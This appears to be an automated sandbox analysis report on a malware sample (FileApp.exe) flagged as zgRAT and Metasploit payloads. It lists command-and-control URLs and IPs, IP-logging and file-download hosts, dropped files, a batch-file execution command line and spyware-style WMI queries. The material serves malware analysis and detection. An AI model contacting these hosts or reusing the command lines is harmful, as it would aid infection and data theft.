Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.133.61.172/api/twofish.php:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.133.61.172/l
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.133.61.172:80/api/crazyfish.php
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.133.61.172:80/api/twofish.php
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.133.61.172:80/api/twofish.php_
Source: DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gacan.zapto.org_DEBUG.zip/c
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2388267970.0000000001344000.00000008.00000001.01000000.00000012.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2664396294.000000000134D000.00000008.00000001.01000000.00000012.sdmp String found in binary or memory: http://html4/loose.dtd
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegAsm.exe String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004FD3000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2419695402.000000000056B000.00000040.00000400.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDllm_object
Source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.datamarket.azure.com/data.ashx/
Source: xNc0eiwaHinah8TaPUA3TuXZ.exe, 00000008.00000002.2611175093.00000000033C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org/
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org/?format=json
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org:443/?format=json
Source: BitLockerToGo.exe, 00000025.00000002.2666627496.00000000031B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://condedqpwqm.shop/api)M
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://datalake.azure.net/https://api.loganalytics.iohttps://graph.microsoft.us/https://api.loganal
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://datamarket.azure.com/embedded/catalog?client_id=
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://datamarket.azure.com/embedded/consent?client_id=
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://datamarket.azure.com/embedded/query?client_id=
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://datamarket.azure.com/embedded/resultrhttps://datamarket.accesscontrol.windows.net/v2/OAuth2-
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/4
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/download
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/downloadC:
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/downloadT
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/downloadU
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/downloadd
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app:80/download
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app:80/downloadynamic
Source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000000.2385160822.0000000000BB2000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: https://github.com/dotnet/wpf
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://github.com/go-sql-driver/mysql/wiki/old_passwords0001020304050607080910111213141516171819202
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://github.com/go-sql-driver/mysql/wiki/strict-modepkcs7:
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://github.com/golang/protobuf/issues/1609):
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004FD3000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2419695402.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/https://ipgeolocation.io/::
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33EK
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33R
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.33
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/-
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/1nhuM4.js
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/1nhuM4.js4
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/X~
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org:443/1nhuM4.jsrosoft
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://manage.windowsazure.com/publishsettings/indextls:
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://manage.windowsazure.us/publishsettings/indexcrypto/rsa:
Source: DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199768374681
Source: DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199768374681i11ihttps://t.me/edm0dMozilla/5.0
Source: DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/edm0d
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comSetConsoleCursorPositionstre
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2387075578.0000000000C3A000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps://vault.azure.cn/vault.mi
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtransfer.net/
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtransfer.net/EO
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003DCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtransfer.net/V
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2425361902.0000000003D88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtransfer.net/handler/download?action=download&download_id=uuVCUDm6&private_id=cb726802f5f
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53024
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53045
Source: unknown Network traffic detected: HTTP traffic on port 53038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53045 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 53041 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 53024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53036
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53035
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53039
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53038
Source: unknown Network traffic detected: HTTP traffic on port 53035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53044
Source: unknown Network traffic detected: HTTP traffic on port 53039 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53041
Source: unknown Network traffic detected: HTTP traffic on port 53044 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown HTTPS traffic detected: 104.237.62.213:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 76.76.21.98:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 158.69.225.124:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.2.46:443 -> 192.168.2.6:53024 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:53035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53036 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53039 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53044 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53045 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00418AB0 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 22_2_00418AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\TmpFE44.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\Tmp142.tmp Jump to dropped file

System Summary

Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000000B.00000002.2733299099.0000000001980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000C.00000002.2767261547.000000000264A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000B.00000002.2733299099.0000000001AD4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Code function: 14_2_00403899 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 14_2_00403899
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe File created: C:\Windows\SunriseColeman
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BCBB20 22_2_69BCBB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C5FB60 22_2_69C5FB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B81AE0 22_2_69B81AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C5DAB0 22_2_69C5DAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69D09A50 22_2_69D09A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BBFA10 22_2_69BBFA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C21A10 22_2_69C21A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C7DA30 22_2_69C7DA30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C51DC0 22_2_69C51DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B73D80 22_2_69B73D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CC9D90 22_2_69CC9D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BE3D00 22_2_69BE3D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CBDCD0 22_2_69CBDCD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C41CE0 22_2_69C41CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C1FC80 22_2_69C1FC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B91C30 22_2_69B91C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CA9C40 22_2_69CA9C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B83C40 22_2_69B83C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C9DFC0 22_2_69C9DFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69D03FC0 22_2_69D03FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BA1F90 22_2_69BA1F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Security
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0053E310 appears 39 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 69BA3620 appears 89 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00404610 appears 317 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 69D009D0 appears 292 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 69D0D930 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 69D0DAE0 appears 65 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 69BA9B10 appears 92 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 69BDC5E0 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 69CB9F30 appears 50 times
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5644 -ip 5644
Source: FileApp.exe, 00000000.00000000.2114249018.0000000000F8B000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameadsbrowser.exe$ vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2119885644.00000000015FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameVXxHvcJSL.dll0 vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePE.dll& vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePDFReader.exe4 vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVXxHvcJSL.dll0 vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004FD3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePDFReader.exe4 vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2120455815.00000000051AD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePDFReader.exe4 vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVXxHvcJSL.dll0 vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2130007558.00000000058C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamePE.dll& vs FileApp.exe
Source: FileApp.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000000B.00000002.2733299099.0000000001980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000C.00000002.2767261547.000000000264A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000B.00000002.2733299099.0000000001AD4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: classification engine Classification label: mal100.troj.spyw.evad.mine.winEXE@106/105@12/18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BE0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError, 22_2_69BE0300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 22_2_004190A0
Source: C:\Users\user\Desktop\FileApp.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FileApp.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3512:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\UipomonaWW_2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3108:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4344:120:WilError_03
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Mutant created: \Sessions\1\BaseNamedObjects\IntelPowerEExpert
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6836:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1036:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2544:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5644
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe File created: C:\Users\user\AppData\Local\Temp\nsvEF5F.tmp
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Command Command.bat & Command.bat & exit
Source: FileApp.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: FileApp.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
